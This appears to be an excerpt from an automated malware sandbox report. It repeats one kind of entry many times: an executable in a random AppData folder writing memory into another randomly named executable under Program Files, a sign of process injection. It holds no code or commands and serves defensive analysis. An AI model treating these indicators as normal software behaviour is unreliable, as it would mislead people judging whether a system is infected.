Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CE1BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CE1BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: C90000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: CD1778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: CD178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: CD1BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: CD1BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2F50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2F91778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2F9178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2F91BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2F91BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2B30000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2B71778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2B7178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2B71BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2B71BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2390000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 23D1778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 23D178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 23D1BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 23D1BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2C90000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CD1778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CD178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CD1BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CD1BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 29E0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2A21778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2A2178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2A21BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2A21BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 24E0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2521778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 252178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2521BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2521BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 1640000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 1681778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 168178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 1681BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 1681BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CC0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2D01778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2D0178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2D01BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2D01BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2310000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2351778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 235178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2351BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2351BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2A50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2A91778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2A9178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2A91BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2A91BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2720000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2761778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 276178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2761BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2761BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2460000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 24A1778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 24A178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 24A1BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 24A1BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2740000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2781778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 278178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2781BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2781BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 11B0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 11F1778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 11F178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 11F1BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 11F1BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2EA0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2EE1778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2EE178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2EE1BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2EE1BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2AC0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2B01778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2B0178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2B01BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2B01BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 24C0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2501778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 250178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2501BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2501BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2D00000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2D41778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2D4178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2D41BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2D41BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2AC0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2B01778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2B0178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2B01BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2B01BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 3190000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 31D1778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 31D178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 31D1BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 31D1BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2A40000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2A81778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2A8178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2A81BF0	Jump to behavior
